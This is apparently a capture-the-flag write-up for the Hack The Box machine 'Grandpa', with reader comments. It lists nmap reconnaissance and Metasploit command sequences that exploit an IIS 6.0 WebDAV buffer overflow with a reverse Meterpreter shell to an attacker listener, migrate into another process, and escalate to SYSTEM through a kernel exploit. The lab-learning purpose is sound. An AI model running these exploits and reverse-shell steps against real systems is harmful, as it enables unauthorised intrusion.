Let’s get started!

Level: medium

Reconnaissance

The first step is to scan the target for open ports and the services running on them (the -O OS detection flag needs root):

COMMAND: nmap -sC -sV -O -oA grandpa 10.10.10.14

Enumerating Port 80

1. Browse to http://10.10.10.14

As we can see, port 80 is open and is served by Microsoft IIS 6.0.

Let's look for exploits for IIS 6.0. There are a number of them; the one we will use targets the WebDAV component.

Here is a sample exploit for the vulnerability mentioned above.

Let's use an Nmap NSE script to check whether this machine is actually vulnerable before throwing an exploit at it.

To create the NSE script, copy the contents of the script referenced above into a new file.

The script file needs to live inside the Nmap scripts directory:

/usr/share/nmap/scripts

COMMAND: nano /usr/share/nmap/scripts/iis-buffer-overflow.nse

Run the iis-buffer-overflow NSE script

Now that the script is in place, let's see if the machine is vulnerable (note the double dash in --script; the script only needs port 80, so restrict the scan to it):

COMMAND: nmap --script iis-buffer-overflow -p 80 10.10.10.14

BOOM!

Now that we know the machine is vulnerable, let's find a working exploit!

Initial Foothold and Priv Esc – Root 

ExplodingCan IIS 6.0 WebDAV BoF Exploit

ExplodingCan is an NSA-developed exploit, leaked by the Shadow Brokers, for a stack buffer overflow in the WebDAV component of IIS 6.0 (CVE-2017-7269, in the ScStoragePathFromUrl function). I found a GitHub page that details how the exploit works with a Python script.

I also found out that there is a Metasploit exploit for this too, which I had to use, as my shells for the Python script always failed with netcat and multi/handler.

So to exploit the vulnerability, I'm going to use the Metasploit method:

Find the exploit

Let's use the Metasploit search function to find the correct exploit:

search explodingcan

Then load the module, review its options, and point it at the target with a reverse Meterpreter payload:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl
show options
set rhosts 10.10.10.14
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.2
set lport 9002
run

We get a shell, but it runs as the IIS worker account (NT AUTHORITY\NETWORK SERVICE), so reading the user flag returns access denied.

Let's background the current session and look for a local privilege escalation exploit to get past those permissions!

COMMAND: bg

Local Exploit Suggester 

I'm going to use the built-in Metasploit post-exploitation module, Local Exploit Suggester, to find a route to either Harry or Administrator. It needs to know which session to inspect:

use post/multi/recon/local_exploit_suggester
set session 1
run

Exploiting ppr_flatten_rec 

So the machine looks to be possibly vulnerable to a few exploits, but we will concentrate on the last one listed: ppr_flatten_rec (MS13-053, a kernel-mode Win32k privilege escalation). It runs through the existing Meterpreter session and needs its own listener port for the new SYSTEM session:

use exploit/windows/local/ppr_flatten_rec
set session 1
set lhost 10.10.14.2
set lport 9003
run

After I ran the exploit, I faced some errors and the exploit failed to run!

The session we have is sitting inside the IIS process we just overflowed and is fragile, so let's get back into the previous session (session 1), list its processes, and migrate into a more stable one before running the exploit again:

COMMAND: ps

So, I'm going to migrate into davcdata.exe (the WebDAV worker, PID 2244 in the process list; it runs as NETWORK SERVICE like our shell, so no extra privilege is needed to inject into it).

COMMAND: migrate 2244

Running the exploit again

Now that we have migrated to a new process, let's run the exploit again:

The exploit works, and we get a new Meterpreter session as NT AUTHORITY\SYSTEM!

If you like my writeup, give me respect on my HTB profile: Exp1o1t9r

2 COMMENTS

  1. Hey Exp1o1t9r,

    could you explain to me how you figured out that you have to migrate to another process and why you chose davcdata? Btw your process did not work for me.. I had to migrate to w3wp – any idea why? Resources welcome 🙂

    Thanks

    • First, I need a stable Meterpreter session, and second, tools are already available in various repositories.
      If you are familiar with those tools, you will know which tool to use by checking the version. When I exploited using Meterpreter, the connection got terminated during privilege escalation,
      so I preferred to migrate into a process. So I chose davcdata.exe (YOU CAN CHOOSE ANY OTHER RUNNING PROCESS) as it was running as network service!!
      If you like my writeup, give respect to my Hackthebox profile
